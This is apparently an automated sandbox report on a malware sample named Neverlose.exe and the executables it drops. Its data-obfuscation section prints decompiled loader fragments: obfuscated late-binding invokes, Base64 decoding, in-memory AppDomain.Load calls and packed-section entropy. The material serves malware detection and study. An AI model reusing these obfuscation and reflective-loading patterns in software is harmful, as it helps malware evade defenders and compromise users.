                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\Neverlose.exe | Unpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.data:ER;
                  Source: C:\Users\user\Desktop\Neverlose.exe | Unpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: SolaraBootstrapper.exe.0.dr | Static PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
                  Source: Neverlose.exe | Static PE information: section name:
                  Source: Neverlose.exe | Static PE information: section name:
                  Source: Neverlose.exe | Static PE information: section name:
                  Source: Neverlose.exe | Static PE information: section name:
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01353D5C push D3AFC910h; retf | 0_2_01353D61
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0135559F pushfd ; iretd | 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_013559D1 push ecx; ret | 0_2_013559DF
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_013555C7 pushfd ; iretd | 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01355608 pushfd ; iretd | 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0135569C pushfd ; iretd | 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_013538F7 push 00000048h; retf | 0_2_01353916
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01356AE0 push 1ACE3110h; iretd | 0_2_01356AE5
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01354EDD push ebx; iretd | 0_2_01354EDE
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01024104 push ecx; mov dword ptr [esp], edx | 0_2_01024109
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0102819C push ecx; mov dword ptr [esp], edx | 0_2_0102819E
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0102432C push ecx; mov dword ptr [esp], edx | 0_2_01024331
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_010103EA push 01010418h; ret | 0_2_01010410
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01020536 push 010205B5h; ret | 0_2_010205AD
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0102654C push ecx; mov dword ptr [esp], edx | 0_2_0102654D
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01018556 push 010186D8h; ret | 0_2_010186D0
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0100E5F0 push 0100E641h; ret | 0_2_0100E639
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0102E40C push ecx; mov dword ptr [esp], edx | 0_2_0102E411
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01010424 push 01010450h; ret | 0_2_01010448
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01024448 push ecx; mov dword ptr [esp], edx | 0_2_0102444D
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01022454 push 010224A1h; ret | 0_2_01022499
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0101045C push 01010488h; ret | 0_2_01010480
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0102448C push ecx; mov dword ptr [esp], edx | 0_2_01024491
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01010494 push 010104C0h; ret | 0_2_010104B8
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_010104F8 push 0101052Ch; ret | 0_2_01010524
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01010738 push 0101085Ch; ret | 0_2_01010854
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_010186DA push 0101874Bh; ret | 0_2_01018743
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0100E968 push 0100E994h; ret | 0_2_0100E98C
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_01020804 push 01020830h; ret | 0_2_01020828
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0101885E push 0101888Ch; ret | 0_2_01018884
                  Source: C:\Users\user\Desktop\Neverlose.exe | Code function: 0_2_0100E8AA push 0100E8D8h; ret | 0_2_0100E8D0
                  Source: Neverlose.exe | Static PE information: section name: entropy: 7.99709234138958
                  Source: Neverlose.exe | Static PE information: section name: entropy: 7.501912508388803
                  Source: Neverlose.exe | Static PE information: section name: .data entropy: 7.984098571143187
                  Source: Solara.exe.0.dr, WUHrLuAzG76gjb420QL2petRr.csHigh entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: Solara.exe.0.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csHigh entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: Solara.exe.0.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csHigh entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: Solara.exe.0.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.csHigh entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csHigh entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: Solara.exe.0.dr, P2XOur6bqoe5LxNtDHyiL3aGh.csHigh entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: Solara.exe.0.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csHigh entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csHigh entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 